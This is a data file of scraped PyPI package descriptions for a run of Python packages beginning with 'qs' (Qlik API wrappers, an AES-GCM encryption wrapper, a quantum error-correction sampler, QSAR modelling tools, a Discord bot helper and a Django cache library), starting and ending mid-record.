async$pipinstallqrztools[all]# enable the CLI$pipinstallqrztools[cli]Note:Ifrequests,aiohttp, orrichare installed another way, you will also have access to the sync, async, or command-line interface, respectively.DocumentationDocumentation is available onReadTheDocs.CopyrightCopyright 2021 classabbyamp, 0x5cReleased under the BSD 3-Clause License.SeeLICENSEfor the full license text."} +{"package": "qs", "pacakge-description": "DescriptionQuickShare (qs) is a variant of the (now legacy) SimpleHTTPServer present in\npython 2.x. It allows one to share quickly directories by opening a http\nserver. qs supports both python2 and python3.You can define an upload rate limit to prevent the clients from using all\nyour bandwidth and it automatically searches a free port if the given or\ndefault one is taken.Why QuickShare?http://xkcd.com/949/Sharing is fun, but it quickly becomes a pain when dealing with multiple\noperating systems, platforms and unexperimented users. Nowadays, almost\neverything has a web interface, why should\u2019nt we use it?DocumentationUsage: qs [-h] [-p PORT] [-r RATE] [--no-sf] [FILE]...\n\nOptions:\n -h, --help Print this help and exit.\n -p, --port PORT Port on which the server is listenning.\n Default is 8000\n -r, --rate RATE Limit upload to RATE in ko/s.\n Default is 0 meaning no limitation.\n --no-sf Do not search a free port if the selected one is taken.\n Otherwise, increase the port number until it finds one.\n --version Print the current version\n\nArguments:\n FILE Files or directory to share.\n Default is the current directory: `.'\n If '-' is given, read from stdin.\n If 'index.html' is found in the directory, it is served.Dependenciesdocopthttps://github.com/docopt/docoptor \u201cpip install docopt\u201dInstallThe simplest is to usepip install qsor, in this directory,python setup.py installLicenseThis program is under the GPLv3 License.You should have received a copy of the GNU General Public License\nalong with this program. If not, see .ContactMain developper: C\u00e9dric Picard\nEmail: cedric.picard@efrei.net"} +{"package": "qsa", "pacakge-description": "OpenQSA provides this Python package for QSA analysis of signals, including the JSON files exported from RTXI.It is recommended to install Python 3.7 with pip3 on the computer.It is also a good practice to work in isolation inside a python3 virtual environment.The package can be installed using pip3:pip3 install qsaDetailed instructions for installation and use are given on the official web siteopenqsa.org"} +{"package": "qsaas", "pacakge-description": "StatusqsaasA wrapper for the Qlik Sense Enterprise SaaS APIs.Intended audienceDevelopers -- familiarity with theQlik Sense Enterprise APIsis required.High-level benefits:Automatic pagination on GETs, returning all results.Ability to asynchronously make POSTs, PUTs, and PATCHs, where one can input the amount of threads you'd like (default is 10), dramatically decreasing processing time.Ease of establishing and managing connections to multiple tenants.Ability to connect to any API endpoint.Table of ContentsInstallationConfigurationBasic UsageAdvanced UsageComplete list of functionsAdditional NotesInstallationpip install qsaasDependencies (auto-installed by pip):requests\nrequests_toolbelt\naiohttp\nasyncioConfigurationTo import qsaas, as qsaas only currently has one class,Tenant, the simplest way is:fromqsaas.qsaasimportTenantFrom there, one can instantiate a newTenantobject by executingq=Tenant()Option AIf connecting locally, the simplest way can be to use a json file for each tenant, as these files can be securely stored locally. The file must be a valid json file with the following structure:{\"api_key\":\"\",\"tenant_fqdn\":\"..qlikcloud.com\",\"tenant_id\":\"\"}When creating a newTenantobject then, the named paramconfigcan be used as follows (in this case, the file name is \"config.json\":q=Tenant(config=\"config.json\")Option BIf it's preferred to feed in the api_key, tenant_fqdn, and tenant_id in a different manner, one can instead execute:q=Tenant(api_key=,tenant=,tenant_id=)Basic UsageGet all users from a tenant and print their IDsusers=q.get('users')foruserinusers:print(user['id'])Get a specific user from a tenantuser=q.get('users',params={\"subject\":\"QLIK-POC\\dpi\"})Get all apps from a tenant and print their namesapps=q.get('items',params={\"resourceType\":\"app\"})forappinapps:print(app['name'])Get all spaces from a tenantspaces=q.get('spaces')Create a new userbody={\"tenantId\":q.tenant_id,\"subject\":'WORKSHOP\\\\Qlik1',\"name\":'Qlik1',\"email\":'Qlik1@workshop.com',\"status\":\"active\"}q.post('users',body)Reload an applicationreload=q.post('reloads',json.dumps({\"appId\":\"\"}))Reload an application and waitreload_id=q.post('reloads',json.dumps({\"appId\":\"\"}))['id']status=Nonewhilestatusnotin['SUCCEEDED','FAILED']:time.sleep(1)status=q.get('reloads/'+reload_id)['status']Publish an applicationapp_id=space_id=app=q.post('apps/'+app_id+'/publish',json.dumps({\"spaceId\":space_id}))payload={\"name\":app['attributes']['name'],\"resourceId\":app['attributes']['id'],\"description\":app['attributes']['description'],\"resourceType\":\"app\",\"resourceAttributes\":app['attributes'],\"resourceCustomAttributes\":{},\"resourceCreatedAt\":app['attributes']['createdDate'],\"resourceCreatedBySubject\":app['attributes']['owner'],\"spaceId\":space_id}q.post('items',json.dumps(payload))Change the owner of an applicationapp_id=user_id=q.put('apps/'+app_id+'/owner',json.dumps({\"ownerId\":user_id}))Import an applicationwithopen('.qvf','rb')asf:data=f.read()app=q.post('apps/import',data,params={\"name\":\"\"})payload={\"name\":app['attributes']['name'],\"resourceId\":app['attributes']['id'],\"description\":app['attributes']['description'],\"resourceType\":\"app\",\"resourceAttributes\":app['attributes'],\"resourceCustomAttributes\":{},\"resourceCreatedAt\":app['attributes']['createdDate'],\"resourceCreatedBySubject\":app['attributes']['owner']}q.post('items',json.dumps(payload))Advanced UsageUpload a file to DataFilesfile_path=directory_path+'\\\\'+file_namebody=open(file_path,'rb')q.post('qix-datafiles',body,params={\"connectionId\":conn_id,\"name\":file_name})Asynchronously reload multiple applicationsNote:The default threading is 10 at a time--to modify this, add the named paramchunks=x, where x is an integer. Do not make this integer too high to avoid rate limiting.app_ids=['','','']payloads=[json.dumps({\"appId\":app_id})forapp_idinapp_ids]q.async_post('reloads',payloads=payloads)Asynchronously delete apps that have the name \"delete_me\"Note:This process currently requires deleting both from theappsanditemsendpoints. The default threading is 10 at a time--to modify this, add the named paramchunks=x, where x is an integer. Do not make this integer too high to avoid rate limiting.items=q.get('items',params={\"resourceType\":\"app\",\"name\":\"delete_me\"})delete_dict={}delete_dict['items']=[item['id']foriteminitems]delete_dict['apps']=[item['resourceId']foriteminitems]foreindelete_dict:q.async_delete(e,ids=delete_dict[e])Asychronously add usersNote:The default threading is 10 at a time--to modify this, add the named paramchunks=x, where x is an integer. Do not make this integer too high to avoid rate limiting.payloads=[]foriinrange(10):user_subject='WORKSHOP\\\\Qlik'+str(i+1)user_name='Qlik'+str(i+1)user_email='Qlik'+str(i+1)+'@workshop.com'body={\"tenantId\":q.tenant_id,\"subject\":user_subject,\"name\":user_name,\"email\":user_email,\"status\":\"active\"}payloads.append(body)q.async_post('users',payloads=payloads)Asynchronously copy applications and assign them to new ownersNote:This is the only \"custom\" style function in all of qsaas, due to the fact that it has hardcoded endpoints and has an multi-step process--as it can copy applications and then assign those applications ot new owners in one go. The default threading is 10 at a time--to modify this, add the named paramchunks=x, where x is an integer. Do not make this integer too high to avoid rate limiting.Copy app and assign ownership to new usersq.async_app_copy('',users=['',''])Simply copy an app 10 times, without assigning new ownershipq.async_app_copy('',copies=10)Customize HeadersNote:This is available for all functions, but should largely not be needed (most headers are automatically generated by the Python libraries used). If the need arises to pass in custom headers, or to overwrite the existing headers, one can leverage the keyword paramheadersas per below.Upload an image to an applicationdata=open('your_image.png','rb').read()q.put('apps//media/files/your_image.png',data,headers={\"Content-Type\":\"image/png\"})Complete list of functionsq.get()q.post()q.put()q.patch()q.delete()q.async_post()q.async_put()q.async_patch()q.async_app_copy()*only custom functionFor each function, one can always refer to the docstring for a helpful description, and most provide examples. For instance,help(q.get)will output:Description\n --------------------\n GETs and paginates all results. Takes optional params.\n\n Mandatory parameters\n --------------------\n endpoint (str), exclude api/{version}\n\n Optional parameters\n --------------------\n params (dict)\n\n Example Usage\n --------------------\n Example 1:\n get('users')\n\n This will return all users.\n\n Example 2:\n get('items', params={\"resourceType\":\"app\"})\n\n This will return all apps from items.Additional NotesAPI DocumentationIt is highly encouraged to review the API documentation atthe qlik.dev portal. As this wrapper does not have wrapped Qlik functions (aside from theasync_app_copyfunction), it is integral to know the API appropriate endpoints to call.SupportThis project is built and maintained by Daniel Pilla, a Principal Analytics Platform Architect at Qlik. This project is however not supported by Qlik, and is only supported through Daniel."} +{"package": "qsafecrypto", "pacakge-description": "QSafeCryptoUtilizing cryptography in your application shouldn't be an intimidating and challenging task. Lets simplify cryptography in your app with QSafeCrypto. It offers easy AES-GCM-256 encryption and decryption, ensuring quantum-safe security.DocumentationFind more in the -Documentations\u00f0\u0178\u00a7\u00aeInstallationYou can install QSafeCrypto using pip:pip install qsafecryptoUsageImport theencryptanddecryptfunctions from the QSafeCrypto package:fromqsafecrypto.aes_gcm_256importencrypt,decryptfromqsafecryptoimportutilEncryptionEncrypt a payload using AES-GCM-256 encryption:data=\"Hello, world!\"key=\"8A6KcShDcvd1jbTBBuTKQupizA7xGivh\"# A 32-byte-key. To generate one use util.random_key_generate(length=32)verification_key=\"myappnameaskey\"# Length & uniqueness doesn't matter.encrypted_data=encrypt(data,key,verification_key)print(\"Encrypted data:\",encrypted_data)# Encrypted data: Vu5YayfedA8NEsaLxMKzn3HNrDWzpkiM3w8VztPLHyqL3ynQSShM3ZjeTheencryptfunction takes the payload, encryption key, and verification key as arguments. By default, it returns the encrypted ciphertext as a string. You can set thedecodeparameter toFalseto receive the ciphertext as bytes.DecryptionDecrypt a encrypted_data using AES-GCM-256 decryption:# encrypted_data = \"Vu5YayfedA8NEsaLxMKzn3HNrDWzpkiM3w8VztPLHyqL3ynQSShM3Zje\"# key = \"8A6KcShDcvd1jbTBBuTKQupizA7xGivh\"# verification_key = \"myappnameaskey\"decrypted_data=decrypt(encrypted_data,key,verification_key)print(\"Decrypted data:\",decrypted_data)# Decrypted data: \"Hello, world!\"Thedecryptfunction takes the ciphertext, decryption key, and verification key as arguments. By default, it returns the decrypted plaintext as a string. Setting thedecodeparameter toFalsewill return the plaintext as bytes.File encyption and decyptionYou can import these two utility function to encode and decode files easily.fromqsafecrypto.utilimportencode_file,decode_fileExample and usage :File Encryption & DecryptionNoteAES-GCM-256 is used for encryption and decryption, as it is considered quantum-safe.Ensure that the same key and verification key used during encryption are provided for successful decryption.AES-GCM-192 and AES-GCM-128 are not supported by choice.Why QSafeCrypto?Cryptography is easy to implement but challenging to implement properly. There are only a few correct ways to do it, but many ways to make mistakes. Additionally, the threat of quantum computers is becoming increasingly evident. Quantum computers have the potential to decipher most existing encryptions through sheer computing power. In this new brave world, we must be prepared. It's time to adopt quantum-safe encryption everywhere, from databases to user confidential information. Everything needs to be encrypted.Brilliant minds in the world have developed algorithms that are deemed safe against quantum computers for the foreseeable future. AES-GCM-256 is one such algorithm.This is why QSafeCrypto embarks on its journey. Although we started with only one algorithm, our goal is to expand our algorithm list.Why I built and use QSafeCrypto, and why you should use itI was coding for my startup, Mindread.io. I was storing the data in key-value pairs in memory to get the fastest possible results. I received the data in JSON format and stored it as a single string after stringifying it. As a SaaS, I don't have the luxury of sending user data to other vendor-provided databases that are encrypted at rest. I have to do it myself. I felt the need to encrypt and decrypt user data. So, how could I encrypt and decrypt it? I started by searching Google for best practices.There is a simple approach: encrypt it with a key, and then decrypt it with the same key. However, I came across a talk by an industry veteran who urged everyone to use quantum-safe encryption to store user data, especially important data. Why? Because in 4-5 years, quantum computers will be able to crack these encryption methods.I thought, \"That's not my problem.\" There's a term in chess: \"Never defend your pieces early against possible attacks.\" So, it will happen in 4-5 years, and then I'll re-encrypt everything.Then, he dropped another bombshell. He said that big hackers are collecting encrypted data in the air and hoarding it en masse. They believe that once quantum computers can crack it, they will be able to see the data. Many data sets will not become stale and will remain relevant. For example, a customer's name, gender, age, and email address. These data sets could be leaked and pose a serious threat.Hmmm... That's pretty concerning. So, what should we do? The protagonist then said, \"Just start implementing quantum-safe encryption from now on. It's the safest bet.\"So, I started researching how to implement quantum-safe encryption. First, I had to find which encryption algorithms are safe from quantum attack. I found a debatable list. NIST has not yet released an official list, but researchers have found a few that are relatively safe.However, I found it very challenging to use existing solutions. Extensive theoretical knowledge was required, and another popular solution, Pycryptodome, also had its complications.During my research, I discovered the Google TINK cryptography library, which was incredibly helpful. However, it still involved substantial theoretical understanding and installation hurdles. Additionally, there was a potential vendor lock-in risk. Most of the time, developers had to be knowledgeable about what they were doing and not \"shoot themselves in the foot.\" Finally, I made the difficult decision to build QSafeCrypto from scratch. After a long research and reading a gazillion amount of internet resources and Stack Overflow questions, I finally implemented it.Since then, the library has been used in production and has successfully encrypted millions of megabytes of data with lower latency and improved ease of use. Now, as a time-tested program, I wanted to make it open source.As I am working with a team, lecturing CS theories like proper nonce and associated tag bytes to make them understand the thing seems difficult. So, I wrapped everything in a simple package and told them to just use the encrypt() and decrypt() functions.I had four requirements for developing it. I followed them religiously.The library must include two functions: one for encryption and another for decryption.A key will be necessary, stored either in the environment variable or in the Key Management System (KMS), which will be used for encryption and decryption.The library must be performant and quantum-safe.It should be designed in a way that even developers cannot easily make errors. Additionally, the encrypted keys should have an aesthetically pleasing appearance.I chose AES-GCM-256 for four reasons as well:It's never been cracked while being quantum-safe!Companies like Signal are using it in their chatting app. Google's Tink library also chooses this algorithm. Big tech are 3. already using it. There is enough social proof.It's fast because there is chip-level support provided by major vendors for this particular algorithm.There is already a supporting Python library with first-class support.Use it to get quantum-safe encryption and decryption from today, easily.How I distilled all the complexities, theories, and parameters into two simple functions?I took inspiration from Google Tink and followed best practices, sticking to my four core requirements without compromise.For AES-GCM-256, each operation requires a unique \"nonce\" key for decryption. To simplify this, I dynamically generate the nonce and merge it with the encrypted key. Developers are relieved from handling the nonce or determining its byte sizes. This approach, inspired by Google TINK, streamlines the process.To ensure verification and authenticity, associated data or tags are crucial. I merge this data into the key, making it easy to verify the data's origin.Overall, my implementation simplifies the handling of nonces and associated data, thanks to the ideas and practices employed by Google Tink.On the other hand to enhance visual appeal, I transformed the key into base58 encoding, resembling a crypto wallet address. This eliminates trailing equal signs commonly found in base64 encoded data. The process relies on a RUST-based library for efficient base58 encoding. Enjoy a visually pleasing key representation without any trailing equal signs.As an example, let's compare the base58 and base64 versions of the same encryption:Base58:s6xFAQPiTDxf97Pw9dtdyUuyWYqD8MiiJAyyo5inSk5zVWm6ifgCDP2Base64:A/Ba6xs3S2lhowPdCdJOsTf+Mv6gt16jhTAfcfG3LfJNJFZep/NkYFU=Why our encrypted data is designed to be human-friendlyBase58 is chosen over base64 for its human-friendly representation. The decision to prioritize human-friendliness led to the selection of base58 encoding over base64.Human-friendly representation: Base58 encoding uses a character set that excludes visually similar characters, making it more human-friendly. It avoids ambiguous characters like \"0\", \"O\", \"I\", and \"l\" that can easily be mistaken for each other. This makes base58 encoding suitable for scenarios where the encoded data needs to be read or communicated by humans, such as in crypto wallet addresses or other user-facing contexts. Qsafecrypto sees a future where every app, interaction is encrypted. So user will see lots of encrypted data in their app.Compact representation: Base58 encoding typically results in a shorter encoded string compared to base64 encoding. By excluding certain characters, base58 achieves a more compact representation, which can be beneficial when dealing with limited space or optimizing data storage. This can be advantageous in scenarios where shorter identifiers or representations are preferred.Padding-free: Base58 encoding does not require padding, as opposed to base64 encoding which uses padding characters (\"=\") to ensure a length divisible by 4. The absence of padding simplifies the handling and manipulation of the encoded data, making base58 more convenient in certain applications.At Qsafecrypto, we envision a future where encryption is ubiquitous, ensuring secure interactions within every application. In this future, users will encounter abundant encrypted data in their apps. Therefore,human-friendliness is of utmost importance in our design philosophy. We strive to create visually pleasing and user-friendly encrypted keys.Leveraging a high-performance base58 encoder-decoder implemented in Rust, we ensure that aesthetic appeal does not come at the cost of performance. With Qsafecrypto, enjoy the perfect blend of security and user-centric design.Contribution\u00f0\u0178\u00a7\u00b5 This package is developed byMd Fazlul Karim, co-founder of Mindread.io. Special thanks to him for his valuable contributions to this project.If you would like to contribute to this project, please feel free to submit a pull request or open an issue. We welcome any suggestions, bug reports, or enhancements.Please make sure to update tests as appropriate.LicenseMIT"} +{"package": "qsample", "pacakge-description": "qsampleInstallpip install qsamplePrerequisitespython3pdflatex (for circuit rendering)When to useFor QEC protocols with in-sequence measurements and feed-forward of\nmeasurement informationApply circuit-level incoherent Pauli noise at low physical error rates\n(i.e.\u00a0high fidelity physical operations)Simulate and sample protocol execution over ranges of varying physical\nerror rates, using customizable callbacksGetting startedimportqsampleasqs# import qsampleimportmatplotlib.pyplotasplt# import matplotlib for visualization of resultsFirst, we need to define a quantum protocol of which we would like to\nknow the logical error rate. Inqsamplea protocol is represented as a\ngraph of quantumCircuits as\nnodes and transitionchecks(to be checked at samplingt ime) as edges.Example: To sample logical error rates of an error-corrected quantum\nstate teleportation protocol, we define the teleportation circuit which\nsends the state of the first to the third qubit.teleport=qs.Circuit([{\"init\":{0,1,2}},{\"H\":{1}},{\"CNOT\":{(1,2)}},{\"CNOT\":{(0,1)}},{\"H\":{0}},{\"measure\":{0,1}}])teleport.draw()Additionally, we need a circuit to (perfectly) measure the third qubit\nafter runningteleport. If the outcome of this measurement is 0\n(corresponding to the initially prepared $|0\\rangle$ state of qubit 1)\nthe teleportation succeded. If the outcome is 1 however, we want to\ncount a logical failure of this protocol. Let\u2019s create a circuit for\nthis measurement and let\u2019s assume we can perform this measurement\nwithout noise.meas=qs.Circuit([{\"measure\":{2}}],noisy=False)Between theteleportandmeascircuits apply a correction to qubit 3\nconditioned on the measurement outcome (syndrome) of the teleportation\ncircuit. We define the lookup functionlutdeflut(syn):op={0:'I',1:'X',2:'Z',3:'Y'}[syn]returnqs.Circuit([{op:{2}}],noisy=False)Finally, define the circuit sequence and transition logic together\nwithin aProtocolobject. Note that protocols must always commence with a uniqueSTARTnode and terminate at a uniqueFAILnode, where the latter expresses a\nlogical failure event.tele_proto=qs.Protocol(check_functions={'lut':lut})tele_proto.add_nodes_from(['tele','meas'],circuits=[teleport,meas])tele_proto.add_edge('START','tele',check='True')tele_proto.add_edge('tele','COR',check='lut(tele[-1])')tele_proto.add_edge('COR','meas',check='True')tele_proto.add_edge('meas','FAIL',check='meas[-1] == 1')tele_proto.draw(figsize=(8,5))Notice that we do not define any initial circuit for the correctionCORbut pass our lookup function to thecheck_functionsdictionary,\nwhich makes it accessible inside thechecktransition statements\n(edges) between circuits. This way we can dynamically insert circuits\ninto the protocol at execution time.After the protocol has been defined we can repeatedly execute\n(i.e.\u00a0sample) it in the presence of incoherent noise. Let\u2019s say we are\ninterested in the logical error rates for physical error rates on all 1-\nand 2-qubit gates of $p_{phy}=10^{-5}, \\dots, 10^{-1}$, and $0.5$. The\ncorresponding noise model is calledE1in qsample. The\ngroups of all 1- and 2-qubit gates are indexed by the keyqinE1. Other noise\nmodels (and their parameters) are described in the documentation.err_model=qs.noise.E1err_params={'q':[1e-5,1e-4,1e-3,1e-2,1e-1,0.5]}We are ready to sample. As our protocol only contains Clifford gates\nlet\u2019s choose theStabilizerSimulator,\nas well as thePlotStatscallback for plotting the resulting logical error rate as function of\n$p_{phy}$.sam=qs.DirectSampler(protocol=tele_proto,simulator=qs.StabilizerSimulator,err_model=err_model,err_params=err_params)sam.run(n_shots=20000,callbacks=[qs.callbacks.PlotStats()])p=('1.00e-05',): 0%| | 0/20000 [00:00>>importqsAPIOr just a simple command line console if complex scripts are no needed:UsageConnecting with certificatesThe first step is to build a handler invoking the constructor of the class you will use containing the host parameters, this will attempt to connect to the Qlik Sense server. Just export previously from QlikSense console the certificate in portable format and copy the folder in your machine:>>>qrs=qsAPI.QRS(proxy='hostname',certificate='path\\\\client.pem')Connecting with windows credentials (NTLM)Alternatively, the constructor accept user credentials via arguments.>>>qrs=qsAPI.QRS(proxy='hostname',user=('yor_domain','username','password'))ExamplesCount users using a filterqrs.count('user',\"Name eq 'sa_repository'\")Duplicate an application in the serverqrs.AppCopy('a99babf2-3c9d-439d-99d2-66fa7276604e',\"HELLO world\")Export an applicationqrs.AppExport('a99babf2-3c9d-439d-99d2-66fa7276604e',\"c:\\\\path\\\\myAppName.qvf\")Export all published applications to directoriesforappinqrs.AppGet(pFilter=\"stream.name ne 'None'\"):os.makedirs(app['stream']['name'],exist_ok=True)qrs.AppExport(app['id'],app['stream']['name']+'\\\\'+app['name'])Retrieve security rules using a filterqrs.SystemRulesGet(\"type eq 'Custom'\")Retrieve a list of sessions for a user[x['SessionId']forxinqps.GetUser('DIR','name').json()]teardown of all connections for the user and related sessionsqps.DeleteUser('DIR','name')More examplesTake a look at the Wiki area: (https://github.com/rafael-sanz/qsAPI/wiki)Command LineAlternative use as command line is available too, examples:qsAPI --help\nqsAPI -s myServer -c dir/client.pem -Q QRS TaskStartbyName \"Reload License Monitor\"\nqsAPI -s myServer -c dir/client.pem -Q QRS -v INFO AppExport d8b120d7-a6e4-42ff-90b2-2ac6a3d92233\nqsAPI -s myServer -c dir/client.pem -Q QRS -v INFO AppReload 79f0c591-67de-4ded-91ae-4865934a5746TODOThe module is in progress, a subset of methods are implemented. But all the endpoints could be implemented through the inner classdriverand the methodsget, post, put, delete.qps.driver.get('/qrs/about/api/enums')LicenseThis software is made available \"AS IS\" without warranty of any kind. Qlik support agreement does not cover support for this software."} +{"package": "qsarify", "pacakge-description": "qsarifyqsarify is a library of tools for the analysis of QSAR/QSPR datasets and models. This library is intended to be used to produce models which relate a set of calculated chemical descriptors to a given numeric endpoint. Many great tools will take the geometry or string data of a given chemical and computedescriptors, which are numeric measures of the properties of these, but you can generate some of these with another one of my scripts,Free Descriptors.DependenciesPython 3numpypandasscikit-learnmatplotlibInstallationpip install qsarifyWhat is included right now?Data preprocessing tools:data_toolsDimensionality reduction via clustering:clusteringFeature selection:Single threaded:feature_selection_singleMulti-threaded:feature_selection_multiModel Export and Visualization:model_exportCross Valiidation:cross_validationHow to useThe best way to learn how to use this library is to look at the example notebook in theexamplesfolder. This notebook will walk you through the workflow of using this library to build a QSAR model.Future PlansMassively parallel feature selection methods:CUDA accelerationMPI accelerationInclude Shannon Entropy as a dimensionality reduction metric in clusteringEmbedded kernel methodsMore visualization toolsMore cross validation toolsFeature selection tools for categorical dataContributingIf you would like to contribute to this project, please feel free to fork this repository and submit a pull request. Otherwise, you may also submit an issue. I will try to respond to issues as quickly as possible.LicenseThis project is licensed under the GNU GPLv3 license. See the LICENSE file for more details.CitationIf you use this library in your work, please cite it as follows:Szwiec, Stephen. (2023). qsarify: A high performance library for QSAR model development.BibTex:@misc{szwiec2023qsarify,\n author = {Szwiec, Stephen},\n title = {qsarify: A high performance library for QSAR model development},\n year = {2023},\n publisher = {GitHub},\n journal = {GitHub repository},\n howpublished = {\\url{https://github.com/stephenszwiec/qsarify}},\n }"} +{"package": "qsarmodelingpy", "pacakge-description": "QSARModelingPy CoreQSARModeling\u00e9 uma ferramenta gratuita e open-source para a constru\u00e7\u00e3o e valida\u00e7\u00e3o de modelos QSAR e QSPR.Originalmente desenvolvidoem Java, esta biblioteca em Python permite ao usu\u00e1rio a aplica\u00e7\u00e3o program\u00e1tica, personaliz\u00e1vel e escal\u00e1vel dos recursos do software.Alguns recursos podem ser destacados, como:Redu\u00e7\u00e3o de dimensionalidade baseada em vari\u00e2ncia, correla\u00e7\u00e3o e autocorrela\u00e7\u00e3o;Sele\u00e7\u00e3o de vari\u00e1veis: Ordered Predictors Selection (OPS) ou Algoritmo Gen\u00e9tico (GA)Valida\u00e7\u00e3o cruzada: y-randomization e leave-N-outValida\u00e7\u00e3o externaUsoEsta vers\u00e3o do QSARModelingPy Core \u00e9 uma biblioteca para a linguagem de programa\u00e7\u00e3o Python, com foco em programadores que desejam implementar sua pr\u00f3pria vers\u00e3o do QSAR Modeling, expandi-lo ou utiliz\u00e1-lo programaticamente. Se deseja uma vers\u00e3o funcional desenvolvida para o usu\u00e1rio final, veja asinterfaces do QSARModelingPy.Para utilizar, instale a biblioteca em seu ambiente.$pipinstallqsarmodelingpy"} +{"package": "qsarmodelingpy-gui", "pacakge-description": "QSARModelingPyQSARModelingPy is an open-source computational package to generate and validate QSAR models.What youcando with QSARModelingPySelect variables through either OPS or Genetic AlgorithmDimensionality reduction:Correlation cutVariance cutAutocorrelation cutValidate your models:Cross Validationy-randomization / Leave-N-outExternal ValidationUsageAfter installing this package with:$ pip install qsarmodelingpy-guiJust launch the application:$ qsarmodelingpyor:$ python -m qsarmodelingpy-gui"} +{"package": "qsavvy", "pacakge-description": "Qsavvysavvy's Quantum StuffDocumentation:https://anomius.github.io/qsavvyGitHub:https://github.com/anomius/qsavvyPyPI:https://pypi.org/project/qsavvy/Free software: BSD-3-ClauseFeaturesTODOCreditsThis package was created withCookiecutterand thewaynerv/cookiecutter-pypackageproject template."} +{"package": "qsbot", "pacakge-description": "qsbotAn extension of the discord.py library that makes the initial creation of a bot's code much easier.FeaturesBuilt in functions for easy 'react for role' setupSet welcome message and discord presenceSet single or multiple prefixes for commandsBuilt in command error catch (Probably will end up phasing this out or replacing it with something more practical)Generate starting code from the command lineRoadmapBasic examplesCommand to install examplesCommand to get basic starting code for bot creationServer statisticsCog supportEasy load tokenInstallNot yet on PyPI, I am waiting until this has more features before I add it there, but if this gets some stars then I may consider adding it early. You can still clone this repo and install from there though.git clone https://github.com/Dual-Exhaust/qsbot\n\ncd qsbot\n\npip install .qs_install_examplesA command line function that creates a sub-directory containing the qsbot examples in the current working directory.Usage: qs_install_examplesmakebotA command line function that generates code for you to start with.Usage: makebotOptional arguments-F | --filename : The name of the file generated. If not specified, it will be 'basic_bot.py' by default.-W | --welcome : The welcome message that your bot should send to new members.-P | --prefix : The prefix that your bot should use, if not set it is '$' by default.-Pr | --presence : The discord presence of your bot.-R | --react : How many 'react for role' calls to generate.qsbot.clientThe commands.Bot class from discord.ext.commands is the super class to this one, so initializing is virtually the same.\nNote that the default command prefix is set to '$' so you do not have to set one on initialization.client = qsbot.client(command_prefix='$', *args, **kwargs)Reaction for RolesThe logic behind adding and removing a reaction to add and remove a role is provided by default. You just have to pass what channel you want to listen to and specify what reactions give which roles.set_reaction_for_role_channelUsed to set which channel that the bot will listen to for when users add reactions to gain roles in the server. This must be set before you can use add_reaction_for_role. The channel can be passed as a channel id or as a channel name.Usage: client.set_reaction_for_role_channel( )add_reaction_for_roleUsed to link what reactions give which roles. The first parameter is the reaction name and the second is the role name. These are case sensative and as far as I know only work with custom emojis at the moment.Usage: client.add_reaction_for_role( , )Prefixesset_prefixesUsed to overwrite the default command prefix. This can be passed a single string or a list of strings to set a single or multiple prefixes respectively.Usage: client.set_prefixes( )get_prefixesUsed to return what the current prefixes are. Currently broken, and may also be a duplicate method of commands.Bot.get_prefix.Usage: client.get_prefixes()Presenceset_presenceUsed to set the bots presence in discord. The parameter is a string. Custom statuses have not yet been looked at.Usage: client.set_presence( )Welcome Messageset_welcome_messageSets the welcome message that is sent to the user when they join the server. If this is not set then the default behavior is to send no welcome message. The command can be passed a discord.Embed object or a regular string.Usage: client.set_welcome_message( )get_welcome_messageSimply returns the set welcome message. Returns None if it has not been set.Usage: client.get_welcome_message()On Readyset_on_ready_messageSets the message that gets printed to console when on_ready gets called.Usage: client.set_on_ready_message( )get_on_ready_messageReturns the message that gets printed when on_ready triggers. Returns None if not set.Usage: client.get_on_ready_message()on_readyWhen this triggers, the on_ready_message is printed to console and if a presence has already been specified, then it gets set. It does trigger at some odd times though, read thedocsfor more info about it.Command Error Behavioron_command_errorA default command error is included; however, I may be leaning towards disabling it by default and making it have to be enabled. Sends the discord user the error that occured during calling a command. The default behavior is bound to change as this is impractical."} +{"package": "qsc", "pacakge-description": "pyQSCPython implementation of the Quasisymmetric Stellarator Construction methodThis code implements the equations derived by Garren and Boozer (1991) for MHD equilibrium near the magnetic axis.View themain documentation here"} +{"package": "qscache", "pacakge-description": "qscacheA package for caching Django querysets with type hinting in mind.RequirementsDjango >= 3.0.12,<4.0.0django-redis == 5.0Installationpip install qscacheVersioningThis package is young so consider pining it with the exact version of package in production.\nPatch releases don't include any backward incompatible changes but major and minor releases may include backward incompatible changes.ExampleOur purpose is to keep the API simple and easy-to-use.\nYou must give theBaseCacheManagerclass to your cache classes kinda like how you create models in Django. For example:inmodels.py:from django.db import models \nfrom django.contrib.auth import get_user_model \n\n\nUser = get_user_model()\n\n \nclass Example(models.Model): \n\t\"\"\"Example\n\tA simple example Django model like before\n\t\"\"\"\n \n\tuser = models.ForeignKey(User, on_delete=models.CASCADE, related_name=\"example_user\") \n users = models.ManyToManyField(User, related_name=\"examples\") \n is_active = models.BooleanField(default=True)incache.py:from django.http import Http404\nfrom qscache import BaseCacheManager\n\nfrom .models import Example\n\n\nclass ExampleCacheManager(BaseCacheManager[Example]):\n\n\t# These are all the options you have but only model is required.\n\tmodel = Example\n\tcache_key = \"example\" \n\trelated_objects = [\"user\"]\n\tprefetch_related_objects = [\"users\"] \n\tuse_prefetch_related_for_list = True \n\tlist_timeout = 86400 # 1 day\n\tdetail_timeout = 60 # 1 minute\n\texception_class = Http404\n\nexample_cache_manager = ExampleCacheManager()This is all you need to do. now you are good to use your cache manager.# This is the equivalent to Example.objects.all()\n# It hits database first time we fetch example list\n# But later we fetch data from cache until cache is expired\n# It returns Queryset[Example]\nexample_list = example_cache_manager.all()\n\n# This is the equivalent to Example.objects.get(pk=1)\n# It hits database first time we fetch example list\n# But later we fetch data from cache until cache is expired\n# It returns an Example instance\nexample_object = example_cache_manager.get(\n\tunique_identifier=1, # pk = 1\n\tfilter_kwargs={\"pk\": 1},\n)Developer GuideNow lets look at how everything is working by detail.BaseCacheManageroptions:model:This is the only required field that you should specify in your model cache manager. We use this model to query database and fetch data.cache_key:The default value isNone. If it'sNonewe use the model lowercase class name. if you want to override it just use a string as cache key. We use this cache key as our cache key separator from other model cache keys. So make sure it's unique. Defaults toNone.cache_keyis our list cache key.cache_manager.all()will be stored incache_key.{cache_key}_{unique_identifier}is our detail cache key. if your unique identifier is pk(for example 1) then your detail cache key is{cache_key}_1.cache_manager.get()uses this cache key. your unique identifier can be anything but make sure it's unique so your objects won't be overridden in cache. For exampleslug,username, etc.related_objects:If your model has foreign keys and you want to useselect_relatedin your queries. Just pass a list containing your foreign key field names. Defaults toNone.prefetch_related_objects:if you wanna useprefetch_relatedin your query just add a list containing your many to many fields. Defaults 